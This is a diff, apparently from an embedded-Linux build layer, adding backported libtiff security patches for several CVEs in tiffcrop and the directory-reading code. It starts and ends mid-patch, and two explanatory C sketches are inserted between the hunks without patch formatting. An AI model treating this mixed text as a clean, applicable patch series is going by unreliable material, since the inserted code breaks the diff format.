++
++
++/*
+ * Read IFD structure from the specified offset. If the pointer to
+ * nextdiroff variable has been specified, read it too. Function returns a
+ * number of fields in the directory or 0 if failed.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_open.c
++++ tiff-4.1.0+git191117/libtiff/tif_open.c
+@@ -353,7 +353,8 @@ TIFFClientOpen(
+ if (!TIFFDefaultDirectory(tif))
+ goto bad;
+ tif->tif_diroff = 0;
+- tif->tif_dirlist = NULL;
++ tif->tif_dirlistoff = NULL;
++ tif->tif_dirlistdirn = NULL;
+ tif->tif_dirlistsize = 0;
+ tif->tif_dirnumber = 0;
+ return (tif);
+--- tiff-4.1.0+git191117.orig/libtiff/tiffiop.h
++++ tiff-4.1.0+git191117/libtiff/tiffiop.h
+@@ -145,7 +145,8 @@ struct tiff {
+ #define TIFF_CHOPPEDUPARRAYS 0x4000000U /* set when allocChoppedUpStripArrays() has modified strip array */
+ uint64 tif_diroff; /* file offset of current directory */
+ uint64 tif_nextdiroff; /* file offset of following directory */
+- uint64* tif_dirlist; /* list of offsets to already seen directories to prevent IFD looping */
++ uint64* tif_dirlistoff; /* list of offsets to already seen directories to prevent IFD looping */
++ uint16* tif_dirlistdirn; /* list of directory numbers to already seen directories to prevent IFD looping */
+ uint16 tif_dirlistsize; /* number of entries in offset list */
+ uint16 tif_dirnumber; /* number of already seen directories */
+ TIFFDirectory tif_dir; /* internal rep of current directory */
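The rules listed in the commit message reduce to a lookup over (IFD number, offset) pairs. A simplified, self-contained sketch of that bookkeeping is below; the names and fixed-size arrays are illustrative, the real implementation is _TIFFCheckDirNumberAndOffset() in the hunks above:

#include <stdint.h>

#define MAX_IFDS 65535

struct ifd_list {
    uint64_t off[MAX_IFDS];   /* offsets of directories already seen */
    uint16_t dirn[MAX_IFDS];  /* IFD numbers of those directories */
    uint16_t count;           /* number of entries in use */
};

/* Returns 1 if (dirn, diroff) is consistent with the chain seen so far,
 * 0 if the offset is already recorded under a different IFD number,
 * i.e. the directory chain loops back on itself. */
int check_dir_number_and_offset(struct ifd_list *l, uint16_t dirn, uint64_t diroff)
{
    uint16_t n;

    if (diroff == 0)              /* end of chain, nothing to record */
        return 0;

    /* Offset already seen: it must belong to the same IFD number. */
    for (n = 0; n < l->count; n++) {
        if (l->off[n] == diroff)
            return l->dirn[n] == dirn;
    }
    /* IFD number already seen at another offset: the offset of an IFD
     * can legitimately change (e.g. after rewriting), so update it. */
    for (n = 0; n < l->count; n++) {
        if (l->dirn[n] == dirn) {
            l->off[n] = diroff;
            return 1;
        }
    }
    /* New pair: append it to the list. */
    if (l->count == MAX_IFDS)
        return 0;
    l->off[l->count] = diroff;
    l->dirn[l->count] = dirn;
    l->count++;
    return 1;
}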
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
new file mode 100644
index 0000000000..5747202bd9
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
@@ -0,0 +1,26 @@
+From 424c82b5b33256e7f03faace51dc8010f3ded9ff Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Sat, 21 Jan 2023 15:58:10 +0000
+Subject: [PATCH] tiffcrop: Correct simple copy paste error. Fix #488.
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz]
+CVE: CVE-2022-48281
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiffcrop.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a0789a3..8aed9cd 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7564,7 +7564,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+- prev_cropsize = seg_buffs[0].size;
++ prev_cropsize = seg_buffs[i].size;
+ if (prev_cropsize < cropsize)
+ {
+ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
new file mode 100644
index 0000000000..253018525a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
@@ -0,0 +1,157 @@
+From 7808740e100ba30ffb791044f3b14dec3e85ed6f Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:26:43 +0100
+Subject: [PATCH] CVE-2023-0795
+
+This is also the fix for CVE-2023-0796, CVE-2023-0797, CVE-2023-0798,
+CVE-2023-0799.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/afaabc3e50d4e5d80a94143f7e3c997e7e410f68
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0795 CVE-2023-0796 CVE-2023-0797 CVE-2023-0798 CVE-2023-0799
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 51 ++++++++++++++++++++++++++++--------------------
+ 1 file changed, 30 insertions(+), 21 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 8aed9cd..f21a7d7 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -277,7 +277,6 @@ struct region {
+ uint32 width; /* width in pixels */
+ uint32 length; /* length in pixels */
+ uint32 buffsize; /* size of buffer needed to hold the cropped region */
+- unsigned char *buffptr; /* address of start of the region */
+ };
+
+ /* Cropping parameters from command line and image data
+@@ -532,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **);
++ unsigned char **, int);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -5112,7 +5111,6 @@ initCropMasks (struct crop_mask *cps)
+ cps->regionlist[i].width = 0;
+ cps->regionlist[i].length = 0;
+ cps->regionlist[i].buffsize = 0;
+- cps->regionlist[i].buffptr = NULL;
+ cps->zonelist[i].position = 0;
+ cps->zonelist[i].total = 0;
+ }
+@@ -6358,8 +6356,13 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ image->adjustments & ROTATE_ANY);
+ return (-1);
+ }
+-
+- if (rotateImage(rotation, image, &image->width, &image->length, work_buff_ptr))
++
++ /* Dummy variable in order not to switch two times the
++ * image->width,->length within rotateImage(),
++ * but switch xres, yres there. */
++ uint32_t width = image->width;
++ uint32_t length = image->length;
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
+ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+@@ -6427,7 +6430,6 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ /* These should not be needed for composite images */
+ crop->regionlist[i].width = crop_width;
+ crop->regionlist[i].length = crop_length;
+- crop->regionlist[i].buffptr = crop_buff;
+
+ src_rowsize = ((img_width * bps * spp) + 7) / 8;
+ dst_rowsize = (((crop_width * bps * count) + 7) / 8);
+@@ -6664,7 +6666,6 @@ extractSeparateRegion(struct image_data *image, struct crop_mask *crop,
+
+ crop->regionlist[region].width = crop_width;
+ crop->regionlist[region].length = crop_length;
+- crop->regionlist[region].buffptr = crop_buff;
+
+ src = read_buff;
+ dst = crop_buff;
+@@ -7542,7 +7543,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff))
++ &crop->combined_length, &crop_buff, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7648,7 +7649,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff))
++ &crop->regionlist[i].length, &crop_buff, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7780,7 +7781,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr))
++ &crop->combined_length, crop_buff_ptr, TRUE))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8443,7 +8444,7 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+- uint32 *img_length, unsigned char **ibuff_ptr)
++ uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
+ {
+ int shift_width;
+ uint32 bytes_per_pixel, bytes_per_sample;
+@@ -8634,11 +8635,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+
+ *img_width = length;
+ *img_length = width;
+- image->width = length;
+- image->length = width;
+- res_temp = image->xres;
+- image->xres = image->yres;
+- image->yres = res_temp;
++ /* Only toggle image parameters if whole input image is rotated. */
++ if (rot_image_params)
++ {
++ image->width = length;
++ image->length = width;
++ res_temp = image->xres;
++ image->xres = image->yres;
++ image->yres = res_temp;
++ }
+ break;
+
+ case 270: if ((bps % 8) == 0) /* byte aligned data */
+@@ -8711,11 +8716,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+
+ *img_width = length;
+ *img_length = width;
+- image->width = length;
+- image->length = width;
+- res_temp = image->xres;
+- image->xres = image->yres;
+- image->yres = res_temp;
++ /* Only toggle image parameters if whole input image is rotated. */
++ if (rot_image_params)
++ {
++ image->width = length;
++ image->length = width;
++ res_temp = image->xres;
++ image->xres = image->yres;
++ image->yres = res_temp;
++ }
+ break;
+ default:
+ break;
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
new file mode 100644
index 0000000000..bf1a439b4d
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
@@ -0,0 +1,135 @@
+From e18be834497e0ebf68d443abb9e18187f36cd3bf Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:39:52 +0100
+Subject: [PATCH] CVE-2023-0800
+
+This is also the fix for CVE-2023-0801, CVE-2023-0802, CVE-2023-0803,
+CVE-2023-0804.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/33aee1275d9d1384791d2206776eb8152d397f00
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0800 CVE-2023-0801 CVE-2023-0802 CVE-2023-0803 CVE-2023-0804
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 73 +++++++++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 69 insertions(+), 4 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f21a7d7..742615a 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5250,18 +5250,40 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+
+ crop->regionlist[i].buffsize = buffsize;
+ crop->bufftotal += buffsize;
++
++ /* For composite images with more than one region, the
++ * combined_length or combined_width always needs to be equal,
++ * respectively.
++ * Otherwise, even the first section/region copy
++ * action might cause buffer overrun. */
+ if (crop->img_mode == COMPOSITE_IMAGES)
+ {
+ switch (crop->edge_ref)
+ {
+ case EDGE_LEFT:
+ case EDGE_RIGHT:
++ if (i > 0 && zlength != crop->combined_length)
++ {
++ TIFFError(
++ "computeInputPixelOffsets",
++ "Only equal length regions can be combined for "
++ "-E left or right");
++ return (-1);
++ }
+ crop->combined_length = zlength;
+ crop->combined_width += zwidth;
+ break;
+ case EDGE_BOTTOM:
+ case EDGE_TOP: /* width from left, length from top */
+ default:
++ if (i > 0 && zwidth != crop->combined_width)
++ {
++ TIFFError("computeInputPixelOffsets",
++ "Only equal width regions can be "
++ "combined for -E "
++ "top or bottom");
++ return (-1);
++ }
+ crop->combined_width = zwidth;
+ crop->combined_length += zlength;
+ break;
+@@ -6416,6 +6438,47 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ crop->combined_width = 0;
+ crop->combined_length = 0;
+
++ /* If there is more than one region, check beforehand whether all the width
++ * and length values of the regions are the same, respectively. */
++ switch (crop->edge_ref)
++ {
++ default:
++ case EDGE_TOP:
++ case EDGE_BOTTOM:
++ for (i = 1; i < crop->selections; i++)
++ {
++ uint32_t crop_width0 =
++ crop->regionlist[i - 1].x2 - crop->regionlist[i - 1].x1 + 1;
++ uint32_t crop_width1 =
++ crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++ if (crop_width0 != crop_width1)
++ {
++ TIFFError("extractCompositeRegions",
++ "Only equal width regions can be combined for -E "
++ "top or bottom");
++ return (1);
++ }
++ }
++ break;
++ case EDGE_LEFT:
++ case EDGE_RIGHT:
++ for (i = 1; i < crop->selections; i++)
++ {
++ uint32_t crop_length0 =
++ crop->regionlist[i - 1].y2 - crop->regionlist[i - 1].y1 + 1;
++ uint32_t crop_length1 =
++ crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
++ if (crop_length0 != crop_length1)
++ {
++ TIFFError("extractCompositeRegions",
++ "Only equal length regions can be combined for "
++ "-E left or right");
++ return (1);
++ }
++ }
++ }
++
++
+ for (i = 0; i < crop->selections; i++)
+ {
+ /* rows, columns, width, length are expressed in pixels */
+@@ -6439,8 +6502,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ default:
+ case EDGE_TOP:
+ case EDGE_BOTTOM:
+- if ((i > 0) && (crop_width != crop->regionlist[i - 1].width))
+- {
++ if ((crop->selections > i + 1) &&
++ (crop_width != crop->regionlist[i + 1].width))
++ {
+ TIFFError ("extractCompositeRegions",
+ "Only equal width regions can be combined for -E top or bottom");
+ return (1);
+@@ -6520,8 +6584,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ break;
+ case EDGE_LEFT: /* splice the pieces of each row together, side by side */
+ case EDGE_RIGHT:
+- if ((i > 0) && (crop_length != crop->regionlist[i - 1].length))
+- {
++ if ((crop->selections > i + 1) &&
++ (crop_length != crop->regionlist[i + 1].length))
++ {
+ TIFFError ("extractCompositeRegions",
+ "Only equal length regions can be combined for -E left or right");
+ return (1);
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
new file mode 100644
index 0000000000..9915b77645
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
@@ -0,0 +1,91 @@
+From 848434a81c443f59ec90d41218eba6e48a450a11 Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Thu, 16 Mar 2023 16:16:54 +0800
+Subject: [PATCH] Fix heap-buffer-overflow in function extractImageSection
+
+CVE: CVE-2023-1916
+Upstream-Status: Submitted [https://gitlab.com/libtiff/libtiff/-/commit/848434a81c443f59ec90d41218eba6e48a450a11 https://gitlab.com/libtiff/libtiff/-/merge_requests/535]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ archive/tools/tiffcrop.c | 62 +++++++++++++++++++++++++++++-----------
+ 1 file changed, 45 insertions(+), 17 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/tools/tiffcrop.c
++++ tiff-4.1.0+git191117/tools/tiffcrop.c
+@@ -5549,6 +5549,15 @@ getCropOffsets(struct image_data *image,
+ crop->combined_width += (uint32)zwidth;
+ else
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_BOTTOM: /* width from left, zones from bottom to top */
+ zwidth = offsets.crop_width;
+@@ -5579,6 +5588,15 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->combined_length = (uint32)zlength;
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_RIGHT: /* zones from right to left, length from top */
+ zlength = offsets.crop_length;
+@@ -5606,6 +5624,15 @@ getCropOffsets(struct image_data *image,
+ crop->combined_width += (uint32)zwidth;
+ else
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_TOP: /* width from left, zones from top to bottom */
+ default:
+@@ -5632,6 +5659,15 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->combined_length = (uint32)zlength;
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ } /* end switch statement */
+
+@@ -6827,9 +6863,9 @@ extractImageSection(struct image_data *i
+ * regardless of the way the data are organized in the input file.
+ * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
+ */
+- img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
+- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
+- trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
++ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
++ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
++ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
+
+ #ifdef DEVELMODE
+ TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
new file mode 100644
index 0000000000..7d6d40f25a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
@@ -0,0 +1,173 @@
+From 9c22495e5eeeae9e00a1596720c969656bb8d678 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 3 Feb 2023 15:31:31 +0100
+Subject: [PATCH] tiffcrop correctly update buffersize after rotateImage()
+ fix#520 rotateImage() set up a new buffer and calculates its size
+ individually. Therefore, seg_buffs[] size needs to be updated accordingly.
+ Before this fix, the seg_buffs buffer size was calculated with a different
+ formula than within rotateImage().
+
+Closes #520.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9c22495e5eeeae9e00a1596720c969656bb8d678 && https://gitlab.com/libtiff/libtiff/-/commit/688012dca2c39033aa2dc7bcea9796787cfd1b44]
+CVE: CVE-2023-25433
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 69 +++++++++++++++++++++++++++++++++++++++---------
+ 1 file changed, 56 insertions(+), 13 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 742615a..aab0ec6 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **, int);
++ unsigned char **, size_t *);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -6384,7 +6384,7 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ * but switch xres, yres there. */
+ uint32_t width = image->width;
+ uint32_t length = image->length;
+- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
+ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+@@ -7607,8 +7607,12 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
++ /* rotateImage() set up a new buffer and calculates its size
++ * individually. Therefore, seg_buffs size needs to be updated
++ * accordingly. */
++ size_t rot_buf_size = 0;
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff, FALSE))
++ &crop->combined_length, &crop_buff, &rot_buf_size))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7713,8 +7717,13 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+- if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff, FALSE))
++ /* Furthermore, rotateImage() set up a new buffer and calculates
++ * its size individually. Therefore, seg_buffs size needs to be
++ * updated accordingly. */
++ size_t rot_buf_size = 0;
++ if (rotateImage(
++ crop->rotation, image, &crop->regionlist[i].width,
++ &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7725,8 +7734,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ crop->combined_width = total_width;
+ crop->combined_length = total_length;
+ seg_buffs[i].buffer = crop_buff;
+- seg_buffs[i].size = (((crop->regionlist[i].width * image->bps + 7 ) / 8)
+- * image->spp) * crop->regionlist[i].length;
++ seg_buffs[i].size = rot_buf_size;
+ }
+ }
+ }
+@@ -7735,7 +7743,6 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ /* Copy the crop section of the data from the current image into a buffer
+ * and adjust the IFD values to reflect the new size. If no cropping is
+- * required, use the origial read buffer as the crop buffer.
+ *
+ * There is quite a bit of redundancy between this routine and the more
+ * specialized processCropSelections, but this provides
+@@ -7846,7 +7853,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr, TRUE))
++ &crop->combined_length, crop_buff_ptr, NULL))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8515,7 +8522,8 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ uint32 bytes_per_pixel, bytes_per_sample;
+ uint32 row, rowsize, src_offset, dst_offset;
+ uint32 i, col, width, length;
+- uint32 colsize, buffsize, col_offset, pix_offset;
++ uint32 colsize, col_offset, pix_offset;
++ tmsize_t buffsize;
+ unsigned char *ibuff;
+ unsigned char *src;
+ unsigned char *dst;
+@@ -8528,12 +8536,41 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ spp = image->spp;
+ bps = image->bps;
+
++ if ((spp != 0 && bps != 0 &&
++ width > (uint32_t)((UINT32_MAX - 7) / spp / bps)) ||
++ (spp != 0 && bps != 0 &&
++ length > (uint32_t)((UINT32_MAX - 7) / spp / bps)))
++ {
++ TIFFError("rotateImage", "Integer overflow detected.");
++ return (-1);
++ }
++
+ rowsize = ((bps * spp * width) + 7) / 8;
+ colsize = ((bps * spp * length) + 7) / 8;
+ if ((colsize * width) > (rowsize * length))
+- buffsize = (colsize + 1) * width;
++{
++ if (((tmsize_t)colsize + 1) != 0 &&
++ (tmsize_t)width > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
++ ((tmsize_t)colsize + 1)))
++ {
++ TIFFError("rotateImage",
++ "Integer overflow when calculating buffer size.");
++ return (-1);
++ }
++ buffsize = ((tmsize_t)colsize + 1) * width;
++ }
+ else
+- buffsize = (rowsize + 1) * length;
++ {
++ if (((tmsize_t)rowsize + 1) != 0 &&
++ (tmsize_t)length > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
++ ((tmsize_t)rowsize + 1)))
++ {
++ TIFFError("rotateImage",
++ "Integer overflow when calculating buffer size.");
++ return (-1);
++ }
++ buffsize = (rowsize + 1) * length;
++ }
+
+ bytes_per_sample = (bps + 7) / 8;
+ bytes_per_pixel = ((bps * spp) + 7) / 8;
+@@ -8556,11 +8593,17 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ /* Add 3 padding bytes for extractContigSamplesShifted32bits */
+ if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
++ TIFFError("rotateImage",
++ "Unable to allocate rotation buffer of %" TIFF_SSIZE_FORMAT
++ " bytes ",
++ buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
+ _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
+
++ if (rot_buf_size != NULL)
++ *rot_buf_size = buffsize;
++
+ ibuff = *ibuff_ptr;
+ switch (rotation)
+ {
+--
+2.25.1
+
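The hardened size computation above uses the usual pre-multiplication guard: check one factor against MAX / other-factor before forming the product in a wider type. A compact sketch of that guard, with int64_t standing in for libtiff's tmsize_t and illustrative geometry values:

#include <stdint.h>
#include <stdio.h>

/* Compute (rowsize + 1) * length, refusing the request if the product
 * would not fit in int64_t (standing in for libtiff's tmsize_t). */
int checked_buffsize(uint32_t rowsize, uint32_t length, int64_t *out)
{
    int64_t per_row = (int64_t)rowsize + 1;

    if (per_row != 0 && (int64_t)length > INT64_MAX / per_row)
        return 0;                                  /* would overflow */
    *out = per_row * (int64_t)length;
    return 1;
}

int main(void)
{
    int64_t size;

    if (checked_buffsize(70000, 70000, &size))
        printf("buffer size: %lld bytes\n", (long long)size);
    else
        printf("integer overflow when calculating buffer size\n");
    return 0;
}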
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
new file mode 100644
index 0000000000..6a6596f092
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
@@ -0,0 +1,94 @@
+From 69818e2f2d246e6631ac2a2da692c3706b849c38 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sun, 29 Jan 2023 11:09:26 +0100
+Subject: [PATCH] tiffcrop: Amend rotateImage() not to toggle the input (main)
+ image width and length parameters when only cropped image sections are
+ rotated. Remove buffptr from region structure because never used.
+
+Closes #492 #493 #494 #495 #499 #518 #519
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/69818e2f2d246e6631ac2a2da692c3706b849c38]
+CVE: CVE-2023-25434 & CVE-2023-25435
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index aab0ec6..ce84414 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **, size_t *);
++ unsigned char **, size_t *, int);
